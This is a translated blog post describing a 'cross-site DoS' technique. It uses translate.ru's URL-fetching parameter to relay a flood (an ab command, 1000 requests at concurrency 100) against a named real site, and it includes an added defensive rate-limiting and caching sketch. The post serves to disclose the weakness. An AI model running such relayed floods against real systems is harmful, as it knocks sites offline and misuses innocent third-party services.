
Cross-site DoS

Preamble


Nowadays the global network is growing by leaps and bounds, and with it the number of web applications that integrate with each other over HTTP. But is such integration really safe?

In the light of recent events, and while searching for information on DoS and DDoS attacks, I came across an interesting opportunity, namely cross-site attacks. The essence of such an attack is simple: there are countless services on the network that fetch third-party websites on your behalf. These are online translators, image hosts and many others. And if it is a proven service trusted by many, with an extensive infrastructure, built from the start to handle a large flow of traffic, then not only respectable surfers can take advantage of it, but also “bad uncles” for their own benefit.

Experiment


An experiment of this kind can be staged on almost any service that can be pointed directly at the address of the site under attack.

In my case, the donor service was translate.ru.

The site used for the check was kotyachka.ru, which at that time was under multiple “user” attacks and a flood storm. It was chosen only because, at that moment, it was very easy to land on the site's automatic IP ban list, and the list of banned IPs could be viewed directly on the main page.

The task of the experiment was as follows: make the provoked site kotyachka.ru register the IP of the translate.ru service as the IP of the attacking computer.

After a little searching through the HTML of the translation-result page on translate.ru, this line was found:

http://www.translate.ru//url/translation.aspx?direction=er&template=General&autotranslate=on&transliterate=&showvariants=&sourceURL=http://some-url.com

As you can see, the last parameter can be set to any site reachable on the network.

What was done:

user ~ # ab -c 100 -n 1000 "http://www.translate.ru//url/translation.aspx?direction=er&template=General&autotranslate=on&transliterate=&showvariants=&sourceURL=http://kotyachka.ru"

I did not wait for the end of the "test" and stopped it around the middle.
It remains to check the contents of the main page of kotyachka.ru:

[screenshot: the ban list on the kotyachka.ru main page]

And compare it with the IP of translate.ru:

user ~ # nslookup translate.ru
Non-authoritative answer:
Name: translate.ru
Address: 195.131.10.152

Bingo!!!

Findings


It is not hard to guess that the larger the network grows and the more cross-site services we see in the future, the greater the danger that these same services will be used for entirely uncharacteristic purposes, and that one fine day a “friend” will become an enemy.

And if, for image hosts, everything depends on how crooked the hands of their developers are (for instance, whether the URL is checked before it is sent to the third-party server, rather than only the resulting file being checked after the grabber has fetched it), then for online translators and other services that work directly with a site's content the picture is much sadder.
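The URL check mentioned above, from the service operator's side, as an added example that is not part of the original post: a gate in front of a "fetch this URL" endpoint that validates the URL before any request goes out, caps relayed fetches per client and per target host within a window, and answers repeated requests for the same URL from a short-lived cache. The class, function names, limits and addresses are all hypothetical; the traffic is constructed to resemble the experiment above (1000 requests for one sourceURL from one client) and two variants of it.

```python
from collections import Counter, defaultdict, deque
from urllib.parse import urlparse

class FetchGate:
    """Gate in front of an endpoint that fetches a user-supplied URL (cf. sourceURL).
    Hypothetical policy: validate the URL first, cap relayed fetches per client and
    per target host within a window, and answer repeats from a short-lived cache."""

    def __init__(self, window=60, per_client=20, per_target=50, cache_ttl=300):
        self.window, self.per_client, self.per_target = window, per_client, per_target
        self.cache_ttl = cache_ttl
        self.client_hits = defaultdict(deque)   # client_ip -> request timestamps
        self.target_hits = defaultdict(deque)   # target host -> relay attempt timestamps
        self.cache = {}                         # url -> (fetched_at, body)

    def _hits(self, log, key, now):
        q = log[key]
        while q and q[0] <= now - self.window:   # forget timestamps outside the window
            q.popleft()
        q.append(now)
        return len(q)

    def handle(self, client_ip, url, now, fetch):
        """Return how the request was handled: rejected, cached, throttled-* or relayed."""
        parts = urlparse(url)
        if parts.scheme not in ("http", "https") or not parts.hostname:
            return "rejected"                    # check the URL before touching the network
        entry = self.cache.get(url)
        if entry and now - entry[0] < self.cache_ttl:
            return "cached"                      # a burst for one URL reaches the target once
        if self._hits(self.client_hits, client_ip, now) > self.per_client:
            return "throttled-client"
        if self._hits(self.target_hits, parts.hostname, now) > self.per_target:
            return "throttled-target"            # many clients aiming at one victim host
        self.cache[url] = (now, fetch(url))
        return "relayed"

def simulate(requests):
    """Replay constructed (client_ip, url, t) triples through a fresh gate; count outcomes."""
    gate = FetchGate()
    return Counter(gate.handle(ip, u, t, lambda x: f"<html>{x}</html>") for ip, u, t in requests)

# Constructed traffic (RFC 5737 documentation addresses), all within one window.
# 1000 requests for one sourceURL from one client, as in the experiment above:
BURST = [("198.51.100.7", "http://target.example/", i * 0.01) for i in range(1000)]
# Same client adding cache-busting query strings:
BUSTED = [("198.51.100.7", f"http://target.example/?r={i}", i * 0.01) for i in range(1000)]
# 100 clients, 10 unique URLs each, all aimed at one host:
SPREAD = [(f"203.0.113.{c}", f"http://target.example/?c={c}&r={i}", (c * 10 + i) * 0.01)
          for c in range(1, 101) for i in range(10)]
```

Replaying BURST relays a single fetch and serves the other 999 from cache; BUSTED stops at the per-client cap and SPREAD at the per-target cap, so the target host sees at most a few dozen requests instead of a thousand.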

For intruders, this approach has nothing but advantages. Without looking far, one can say that the enormous work of building and maintaining a botnet for DoS attacks no longer requires powerful botnet command centers, and there is no pressing need for bulletproof hosting ... The list could go on, but that is not the point. The prospects are very bright.

Be careful!

Source: https://habr.com/ru/post/51951/
